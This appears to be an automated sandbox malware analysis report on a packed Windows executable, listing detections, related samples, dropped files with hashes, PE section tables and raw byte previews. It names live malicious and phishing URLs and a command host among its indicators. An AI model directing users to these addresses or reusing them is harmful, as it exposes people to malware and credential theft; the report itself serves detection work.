    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
    Detection:MAL
    Classification:mal100.spre.troj.evad.winEXE@5/11@1/1
    EGA Information:
    • Successful, ratio: 50%
    HCA Information:
    • Successful, ratio: 52%
    • Number of executed functions: 14
    • Number of non-executed functions: 14
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.189.173.21
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, PID 2196 because there are no executed function
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    04:32:06API Interceptor1x Sleep call for process: WerFault.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    44.221.84.105BCNFNjvJNq.exeGet hashmaliciousADWIND, Lokibot, Ramnit, SalityBrowse
    • arimaexim.com/logo.gif?68223=2985717
    TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
    • uphca.biz/tbbklctnpyu
    azhIG8vvKQ.exeGet hashmaliciousUnknownBrowse
    • stats.smartiuser.com/installer/bootstrap.php?cmp=4&sub=3489&rkey=%7BDD0D7470-1AC3-4183-A018-75B5D1C73A01%7D
    azhIG8vvKQ.exeGet hashmaliciousUnknownBrowse
    • stats.smartiuser.com/installer/bootstrap.php?cmp=4&sub=3489&rkey=%7B3BBF7CFD-0615-47A2-8DDB-A452B714A70E%7D
    ZqCyroHbgC.exeGet hashmaliciousUnknownBrowse
    • wxanalytics.ru/net.exe
    ZqCyroHbgC.exeGet hashmaliciousUnknownBrowse
    • wxanalytics.ru/net.exe
    OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
    • gahyhiz.com/login.php
    5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
    • gahyhiz.com/login.php
    2zYqUnx8qs.exeGet hashmaliciousUnknownBrowse
    • pwprhhnqqn.in/imgs/krewa/nqxa.php?id=2k81vave&s5=3159&lip=192.168.2.4&win=Unk
    QTCc6zXJy3.exeGet hashmaliciousUnknownBrowse
    • pwprhhnqqn.in/imgs/krewa/nqxa.php?id=7j02szju&s5=3159&lip=192.168.2.4&win=Unk
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    ddos.dnsnb8.net1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
    • 44.221.84.105
    BUG32.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    7Y18r(212).exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
    • 44.221.84.105
    A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
    • 44.221.84.105
    BUG32.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    builder_Release.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • 44.221.84.105
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AMAZON-AESUShttp://ugwebstore.comGet hashmaliciousUnknownBrowse
    • 3.220.57.224
    https://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
    • 34.237.219.119
    BCNFNjvJNq.exeGet hashmaliciousADWIND, Lokibot, Ramnit, SalityBrowse
    • 44.221.84.105
    https://spot-speckle-gardenia.glitch.me/public/rfyiyuki4342.htmlGet hashmaliciousUnknownBrowse
    • 107.21.116.185
    https://ledgerliveofficialsite.gitbook.io/Get hashmaliciousUnknownBrowse
    • 52.203.242.202
    https://sso--cdn-coiinbasepro-cdn-auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
    • 35.175.167.4
    https://sso--cdn---coinbaseppro--auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
    • 52.44.210.203
    https://m6247015k6e0q.wixsite.com/metamasksegninGet hashmaliciousUnknownBrowse
    • 34.198.167.54
    https://currentlyupdate.wixsite.com/signinGet hashmaliciousUnknownBrowse
    • 54.158.69.130
    https://sso--cdn--coinbasepro--eeng--auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
    • 174.129.248.25
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Local\Temp\mXfByV.exe8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
      biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
        biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
          #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
            a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
              1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
                log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                  log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                    2.exeGet hashmaliciousBdaejecBrowse
                      gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
                        Process:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):19456
                        Entropy (8bit):6.589789589884768
                        Encrypted:false
                        SSDEEP:384:1FaSnXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:bpQGPL4vzZq2o9W7GsxBbPr
                        MD5:A753D290B5F137C5E14F2C0FFA430DBA
                        SHA1:15A954A280F95584F19BB242CB305AE1E17563C3
                        SHA-256:B20E35DAAE001A1DCE2512FC5300313F27C9179DD43F864F7E195B58E7A8667A
                        SHA-512:F5DBA2283B80E1CF106D3CC2E4E0C4FE6FD618A768E0ED6E3AC0D4A48F352B25E57DFC8F04F0EF38ABDB9CC0C2753C92F8EDEBD954C0C12FEE35D53275375D6F
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                        Process:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:modified
                        Size (bytes):2389504
                        Entropy (8bit):6.731347692696707
                        Encrypted:false
                        SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                        MD5:D3947937BD08ABD3E79D5C9532B77968
                        SHA1:2BB33A367ED584FF60253A9A9805A4A4947E0CA9
                        SHA-256:C1723D1C47E41F293E7959801A089CA09E3E3697670B5BE6D7075CE64A0EB40C
                        SHA-512:7D6C8DBDC28F7C2F771AA80E8824697DFD24C5C65A7A5036F91F6BACD48D5EE1AD46163F278FED1A69B2FC55B989882143BA89C4ADF74B632D54EBF0CC2F8CCE
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):31744
                        Entropy (8bit):6.365993044865997
                        Encrypted:false
                        SSDEEP:768:uWQ3655Kv1X/qY1MSdV9QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdVKGCq2iW7z
                        MD5:F56AB5FE7D06146EDCFFF516B39ED9C4
                        SHA1:45564D45C08D0A0B7C0D98EEA9848F6BC5155385
                        SHA-256:D9E8CB1FF172D9E11D22BF512567583FF00B7C17A0F568DD08C53598BE056F49
                        SHA-512:3A947238ED99538D468C1885544E19571565AD26FF792B7959465C381BF79E3566348723FD8B0ECBF90941F41A2CAF786592C607C2E82AD91B9E9F31E584D6F0
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9883072157444156
                        Encrypted:false
                        SSDEEP:96:CHpxFEcl9PsbhnJ7afzQXIDcQwc6gcEocw3f+HbHg/5ksS/YyNl1zWDUMsxzLOyF:CJx+cnPq0OkSoj8/AmzuiFYZ24IO8RQ
                        MD5:7364782E8723ED51EB2EB948EF77110B
                        SHA1:3FB3E072558308C63FA99A364E5DA3B2B69A08C6
                        SHA-256:1BD2F3A51A9C5485D90F7087BD87735D50E957297FC16B701A19BEDA9C50FB6F
                        SHA-512:E9771C50D8F7AB583D0EDC85F1458E32A015DF44FBE71B12C5EB0287FA6D4A04F00E3ECF5B1428C5863CC5672037AB6ADD56EED591ED9A63036B8411A79D05BF
                        Malicious:false
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.5.1.7.1.2.3.2.2.1.2.8.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.5.1.7.1.2.3.7.5.2.5.3.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.1.e.5.d.2.3.-.c.a.1.4.-.4.4.2.c.-.a.2.4.d.-.b.d.5.5.8.a.a.7.8.a.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.9.7.4.8.c.8.-.0.c.e.c.-.4.8.4.3.-.9.d.7.8.-.2.0.3.c.f.3.f.f.5.9.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.X.f.B.y.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.9.0.-.0.0.0.1.-.0.0.1.5.-.a.7.6.f.-.2.2.1.1.2.5.0.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.7.d.4.9.9.6.8.7.e.f.4.5.5.e.4.5.d.9.6.2.c.e.c.8.0.d.7.d.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.m.X.f.B.y.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Wed Sep 11 08:32:03 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):160792
                        Entropy (8bit):1.8652145089301015
                        Encrypted:false
                        SSDEEP:768:wnI9uC4eB93FrsQrqw87Dl0SI4V0tSDN/:sIsCpFsQmpDl00kON/
                        MD5:95997C0E8495D92607AE40643A8EE906
                        SHA1:690A39CFDD66C5E08BFB9AE7F65DE4F0C6D4C10A
                        SHA-256:E37B409054E972937AD4A76501C31B94EE76C721B8DCEAF620BE3EC13473792A
                        SHA-512:DFC3E766BA6FF8471658990843DC8111E80CBF85848AA4A56092AF5F7A11102D5D396FE8FA4180CD1E0C16DB9CD51CA42CA1B682A393DE0073D53F883C47A662
                        Malicious:false
                        Reputation:low
                        Preview:MDMP..a..... ........U.f............t...............|.......t...hQ..........T.......8...........T............;..X8.......... !...........#..............................................................................eJ.......#......GenuineIntel............T...........~U.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6268
                        Entropy (8bit):3.720973423639949
                        Encrypted:false
                        SSDEEP:96:RSIU6o7wVetbKE6zLsYmBvtQWLZ5aMQUG89bVIsfCnm:R6l7wVeJKE6kYmJG8pDG89bVIsfCnm
                        MD5:6F25A9D7915CE13FDE39FEAFCE66554B
                        SHA1:4E84CEC28BF8D7644554D5297486FB2E50E34320
                        SHA-256:C13F7EB563A1A7E9AC389781387FF09EDA67D6346990E1762B5C9D3AF857A592
                        SHA-512:9A3CDFCB7E860A16B8C4E48F8F4B7719D9748B0C326E15EB48E70B40BE9CCD61FDF4059B4813F7AE4D1CA9E45E75F31EFAED9C729786835BD32A8D20A4786D4A
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.0.8.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4551
                        Entropy (8bit):4.45364063961648
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsiJg77aI9x2WpW8VYfaYm8M4J4jFUm+q8cdUvD6gRfd:uIjfwI7TX7VCJS/UvOgRfd
                        MD5:01A038703E171E14F019E715CC95D2D3
                        SHA1:A000B99146B0F9AD1E380137E9C66455220324F1
                        SHA-256:1B4493BE345E12D94225AF3269F9C891F2CA9FA21EDE74DDAB63391100D2DC5F
                        SHA-512:965DC77D6C0998D7C981819E40A245641C35D02CE58A92749C9D107011721ACEF3794FE13896C66FFFFE76597373868068D8D2B96C0F530C5B7211FFAEC2F2C4
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="495334" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:foo.
                        Process:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:foo.
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):15872
                        Entropy (8bit):7.031113762428177
                        Encrypted:false
                        SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                        MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                        SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                        SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                        SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 100%
                        • Antivirus: Virustotal, Detection: 96%, Browse
                        Joe Sandbox View:
                        • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                        • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                        • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                        • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                        • Filename: a4#Uff09.exe, Detection: malicious, Browse
                        • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                        • Filename: log1.exe, Detection: malicious, Browse
                        • Filename: log2.exe, Detection: malicious, Browse
                        • Filename: 2.exe, Detection: malicious, Browse
                        • Filename: gracNYJFpD.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.469001989449703
                        Encrypted:false
                        SSDEEP:6144:jzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuN7jDH5Sk:fZHtBZWOKnMM6bFptj4
                        MD5:05AB553A4D136945501F414C2E0267D6
                        SHA1:03D5FFBFDE6149F154C1AF9B155DF99B9B08F106
                        SHA-256:3F90DD350C036731B1FADB9C1B79AF9378B80258B103A37452B9BF65E3641559
                        SHA-512:77B35367EED3813B00841D2D666FBC5A9FD349399F6114287A55C03E77679EBE63370F098AAE2B034A7708226452809E396619583EFC240783789171BF03EEF2
                        Malicious:false
                        Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....%...............................................................................................................................................................................................................................................................................................................................................i..%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.994384033112603
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
                        File size:3'678'720 bytes
                        MD5:6824b9059b9c6f285f3c6caf2ee19ecc
                        SHA1:81e01ba0fe5279ad470cecbb287cb20aec28a13b
                        SHA256:89926d7f0153f7258e706acad4ddfe3106bf4ee11fa711170b2133971022b56f
                        SHA512:b77047369d587ddb38ea8d50d12a5b1f10cb7da56cc6c15bb25930a9669cda65d037e7c51f3121333f2b461dff805557f4cf376f6152a89cc0292bf3c5e99ab3
                        SSDEEP:98304:Av9a5NA1EhlI30MPxbHVAk5vnx1r+7N9+Au2W2xrXMqvqDMk:Av4zkNPpVT7GbG2Wkrbhk
                        TLSH:B806330B30435D95E1DC213CD7EEAD352664BAFF551204FDFA4C4AE963A412AE827A33
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&b.OG..OG..OG...g..LG......CG.. 1..~G...HQ.MG..F?..ZG..OG...G..ya...G.. 1...G.. 1...G...X..NG.. 1..NG.. 1..NG..RichOG.........
                        Icon Hash:638393a30b523248
                        Entrypoint:0xa1c92e
                        Entrypoint Section:.vmp2
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x63C67E77 [Tue Jan 17 10:54:47 2023 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:7c16214c092ec2dcfa6bfaab4ef74f0f
                        Instruction
                        jmp 00007FCC6CE31FFAh
                        mov al, byte ptr [000000DFh]
                        add byte ptr [eax], al
                        add cl, ch
                        adc edx, dword ptr [edi+44890032h]
                        and eax, F6068B00h
                        Programming Language:
                        • [ASM] VS2010 build 30319
                        • [IMP] VS2008 SP1 build 30729
                        • [ C ] VS98 (6.0) SP6 build 8804
                        • [ C ] VS2010 build 30319
                        • [C++] VS2010 build 30319
                        • [RES] VS2010 build 30319
                        • [LNK] VS2010 build 30319
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84ca6c0x168.vmp2
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x97a0000x10fe.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x9790000x114.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x6260000xd0.vmp2
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x25cd160x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x25e0000x275c60x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x2860000xf50e00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .vmp00x37c0000x12900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        +!i~u0x37e0000x50000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .vmp10x3830000x2740680x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .vmp20x5f80000x3809400x380a00d25d3a1c51d94ed87257b21815b90077unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .reloc0x9790000x1140x2000b17e0470b8dded571f1d14da359d4dbFalse0.4140625data2.6397875364567573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x97a0000x10fe0x120001a22eb9db3bcf4f46a1615b46310d7eFalse0.7543402777777778data6.5866211706442135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x97a0e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0ChineseTaiwan0.8446162046908315
                        RT_GROUP_ICON0x97af900x14dataChineseTaiwan1.15
